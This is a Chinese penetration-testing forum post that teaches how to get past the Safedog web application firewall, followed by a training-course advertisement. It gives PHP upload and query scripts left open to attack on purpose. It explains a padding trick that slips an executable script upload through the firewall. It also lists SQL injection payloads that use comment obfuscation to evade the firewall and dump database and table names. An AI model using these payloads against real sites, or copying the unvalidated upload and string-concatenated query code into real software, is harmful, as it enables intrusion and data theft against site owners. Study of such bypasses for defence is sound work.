请选择 进入手机版 | 继续访问电脑版

女安网-零基础入门网络安全学习-渗透测试零基础入门学习

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 3007|回复: 0

SQL注入 上传绕过安全狗

[复制链接]

102

主题

116

帖子

911

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
911
发表于 2017-4-20 20:35:17 | 显示全部楼层 |阅读模式
                       SQL注入 上传绕过安全狗
                    (仅供天融信内部使用)
                                         -----收集整理 by: www.nvhack.com
推荐网站:http://xss.tv  
国内长度最短的XSS平台,支持https协议
1.png


一,绕过安全狗上传可执行脚本
附上php上传脚本源码,此源码未对上传文件类型做校验
<?php
        move_uploaded_file($_FILES["file"]["tmp_name"],"./" . $_FILES["file"]["name"]);
        echo "Stored in: " . "./" . $_FILES["file"]["name"];
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file" />
<input type="submit" name="submit" value="Submit" />
</form>
2.png
------------- 3.png


绕过方法,工具:burpsuite
1,用 php脚本或者js,python等其他语言,生成48930个字符
<?php
for ($i=0; $i <= 48930; $i++) {
        echo 'o';
}
?>

2,抓包,改包
4.png
3,添加后如图:
5.png
4,查看当前目录,上传成功1

6.png

二,sql注入绕过安全狗
1,测试文件,明显的字符型 SQL注入
<?php
        header("Content-type: text/html; charset=utf-8");
        $link = mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $sql = "select * from cms where id='{$_GET['id']}'";
        echo $sql;
        echo '<br>-----------------------------<br>';
        $res = mysql_query($sql);
        while ( $rows = mysql_fetch_array($res)) {
                echo $rows[0];
                echo $rows[1];
                echo $rows[2];
        }
?>
2,正常运行界面
7.png

3,添加注入测试语句
http://localhost/waf123.php?id=3' and 1=1 --+
8.png
4,修改测试语句
http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+

9.png


5,暴库
http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+
10.png
6,爆表
http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+
11.png

2017-3-23 绕过安全狗.pdf (745.17 KB, 下载次数: 452)
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女安网-零基础入门网络安全学习-渗透测试零基础入门学习 ( 津ICP备17008032号-3

GMT+8, 2018-12-17 12:55 , Processed in 0.150841 second(s), 25 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表